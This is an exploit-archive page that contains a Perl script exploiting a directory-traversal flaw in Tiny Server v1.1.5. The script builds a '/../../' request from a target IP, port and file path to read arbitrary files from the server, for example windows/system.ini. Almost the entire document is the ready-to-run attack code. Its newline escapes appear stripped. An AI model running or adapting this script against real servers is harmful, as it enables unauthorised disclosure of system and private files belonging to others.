[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit
# Published : 2012-03-16
# Author :
# Previous Title : Dell Webcam CrazyTalk ActiveX BackImage Vulnerability
# Next Title : Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability
#!/usr/bin/perl -w
#Title : Tiny Server v1.1.5 Arbitrary File Disclosure Exploit
#Author : KaHPeSeSe
#Test : PERFECT XP PC1 / SP3
#Date : 15/03/2012
#Thanks : exploit-db.com
use LWP::Simple;
use LWP::UserAgent;
system('color','A');
system('cls');
print "nt____________________________________________________________________n";
print "nt....... Tiny Server v1.1.5 Arbitrary File Disclosure Exploit .......n";
print "nt....... Founded and Exploited by KaHPeSeSe .......n";
print "nt____________________________________________________________________nn";
if(@ARGV < 3)
{
print "[-] Error!n";
print "[-] Look to examplenn";
&help; exit();
}
sub help()
{
print "[+] How to : perl $0 IP Port Filen";
print "[+] Example : perl $0 192.168.1.2 80 windows/system.inin";
}
($TargetIP, $Port, $File) = @ARGV;
print("Connet to Server.... n");
sleep(2);
$path="/../../";
my $link = "http://" . $TargetIP . ":" . $Port . $path . $File;
print("Connectedn");
sleep(2);
print("Waiting for momentn");
sleep(1);
print("Done! Reading $File...n");
sleep(3);
$ourfile=get $link;
if($ourfile)
{
print("nn____________________________________________________nn");
print("$ourfile nn");
print("_____________________________________________________nn");
}
else
{
print("_____________________________________________________nn");
print(" Not Found !!!nn");
print("_____________________________________________________nn");
exit;
}